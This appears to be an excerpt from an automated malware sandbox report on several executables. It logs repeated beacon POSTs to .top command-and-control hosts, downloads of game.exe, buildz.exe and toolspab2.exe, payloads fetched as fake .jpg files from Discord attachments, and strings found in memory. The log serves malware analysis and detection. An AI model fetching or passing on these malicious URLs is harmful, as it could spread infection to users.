Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xwytsoqpb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ipaup.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://etkxss.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://shpjiv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wmbmyysgg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hpmdwx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lmmge.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fexsjalrxu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xxlvxgkbvo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: hajezey1.top
Source: global traffic	HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bfxffaryp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://blprmuxml.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tkemri.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uereap.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://muywwft.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yfayr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sivhm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uwebveg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lsmjboth.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ucowlihgbp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vchmiecd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pmltrxuim.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tdbyxcrg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hmoapn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sefui.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rjpartffs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: hajezey1.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nusurtal4f.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: nusurtal4f.net
Source: global traffic	HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: nusurtal4f.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: nusurtal4f.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: nusurtal4f.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nusurtal4f.net
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: nusurtal4f.net

Source: 3C84.exe, 00000017.00000002.1153886461.00000000011DC000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 5483.exe, 0000001B.00000003.890205524.0000000002F0C000.00000004.00000001.sdmp	String found in binary or memory: http://telegalive.top/
Source: 5483.exe, 0000001B.00000003.903420999.0000000002F0C000.00000004.00000001.sdmp	String found in binary or memory: http://telegalive.top/T#
Source: 3C84.exe, 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp	String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
Source: 9415.exe, 0000001D.00000003.911648441.0000000006141000.00000004.00000001.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 9415.exe, 0000001D.00000003.924591601.000000000611F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comB.TTF
Source: 9415.exe, 0000001D.00000003.920199088.000000000611E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comC.TTF
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comF
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comFq
Source: 9415.exe, 0000001D.00000003.924591601.000000000611F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comd
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comessed
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.como
Source: 9415.exe, 0000001D.00000003.924591601.000000000611F000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comtue
Source: 9415.exe, 0000001D.00000003.900774797.0000000006141000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 9415.exe, 0000001D.00000003.912397872.000000000611E000.00000004.00000001.sdmp, 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp, 9415.exe, 0000001D.00000003.910887017.000000000611A000.00000004.00000001.sdmp, 9415.exe, 0000001D.00000003.903625198.000000000611E000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp//
Source: 9415.exe, 0000001D.00000003.912899676.000000000611E000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/8?QRs
Source: 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/9
Source: 9415.exe, 0000001D.00000003.910887017.000000000611A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/B
Source: 9415.exe, 0000001D.00000003.910887017.000000000611A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/T
Source: 9415.exe, 0000001D.00000003.912397872.000000000611E000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/~
Source: AdvancedRun.exe, AdvancedRun.exe, 0000001C.00000000.873666893.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001F.00000002.905961037.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000002.908653076.000000000040C000.00000002.00020000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: 9415.exe, 0000001D.00000003.912397872.000000000611E000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.de
Source: 9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn-:
Source: 9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cno.n)N
Source: 9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cnx)T
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regbrowsers.exe, 00000025.00000000.924712591.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: 3C84.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/8
Source: 3C84.exe, 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
Source: 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: xacokuo8.top

Source: global traffic	HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic	HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic	HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic	HTTP traffic detected: GET //l/f/ip0YyXwB3dP17SpzPFlO/7c7502fb88fbef5f30b90af154a6ea21b780c146 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Source: global traffic	HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic	HTTP traffic detected: GET //l/f/ip0YyXwB3dP17SpzPFlO/0d74e69ed04647decaae0af5f3dee7a1ada201c0 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97

Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1e b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
